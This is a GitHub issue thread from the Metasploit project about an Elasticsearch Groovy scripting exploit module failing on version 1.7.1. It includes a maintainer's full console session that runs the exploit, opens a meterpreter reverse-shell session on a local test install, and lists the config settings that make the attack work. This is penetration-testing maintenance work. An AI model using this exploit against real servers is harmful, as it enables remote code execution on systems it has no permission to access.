### ISSUE TITLE
Elasticsearch Groovy Exploit

### ISSUE THREAD

**Issue by kkirsche** [rapid7/metasploit-framework#5969]
RE: https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/elasticsearch/search_groovy_script.rb

The groovy script appears to be partially functional for newer versions of Elasticsearch (e.g. 1.7.1). I was able to create the file on 1.7.1 but the reverse shell / payload failed. With that said, it's straightforward to modify this to get a spawned shell on the device with some modification(s). Would you be interested in a PR to the existing exploit or create a new exploit which spawns a shell?

**Comment by void-in** [comment]
Modify the existing module and add a different target. Then call the appropriate method based upon the selected target.

**Comment by bcook-r7** [comment]
Would you like to submit a PR for this @kkirsche ?

**Comment by dmohanty-r7** [comment]
@kkirsche, I tried to reproduce the issue by installing version 1.7.1 of Elasticsearch locally. I was able to successfully exploit and run the "java/meterpreter/reverse_tcp" payload:

```
msf > use exploit/multi/elasticsearch/search_groovy_script
msf exploit(search_groovy_script) > set payload java/meterpreter/reverse_tcp
payload => java/meterpreter/reverse_tcp
msf exploit(search_groovy_script) > set lhost 127.0.0.1
lhost => 127.0.0.1
msf exploit(search_groovy_script) > set rhost localhost
rhost => localhost
msf exploit(search_groovy_script) > run

[*] Started reverse handler on 127.0.0.1:4444
[*] localhost:9200 - Checking vulnerability...
[*] localhost:9200 - Discovering TEMP path...
[+] localhost:9200 - TEMP path on '/var/folders/8_/3gnbv2zx4pj1htm1tt4_zxfn18dyng/T/'
[*] localhost:9200 - Discovering remote OS...
[+] localhost:9200 - Remote OS is 'Mac OS X'
[*] localhost:9200 - Trying to load metasploit payload...
[*] Sending stage (45643 bytes) to 127.0.0.1
[*] Meterpreter session 1 opened (127.0.0.1:4444 -> 127.0.0.1:57746) at 2015-10-19 15:02:13 -0500
[+] Deleted /var/folders/8_/3gnbv2zx4pj1htm1tt4_zxfn18dyng/T/LVxo.jar

meterpreter >
```

To make this work I did have to append to the config/elasticsearch.yml the following:

```
script.inline: on
script.indexed: on
```

This was because, according to https://www.elastic.co/guide/en/elasticsearch/reference/current/modules-scripting.html, "Groovy dynamic scripting disabled by default from v1.4.3".

If you are still having issues with this module on Elasticsearch 1.7, if you could provide any more information on how you are running it, your environment setup, console output, etc we can look deeper into the issue. Also, feel free to make a PR to make an enhancement to this module.

Thanks!

**Comment by kkirsche** [comment]
Closing as sadly I've been swamped and don't want to keep your issue count up for something I haven't had time to do.

Myself and the rest of our team though found it not working on the 1.x train when the node was on a remote box with both the settings you had provided. I could activate it though when working through the commands locally though, just not via MetaSploit itself. I'll have to ask the other team if I can get their Elasticsearch config
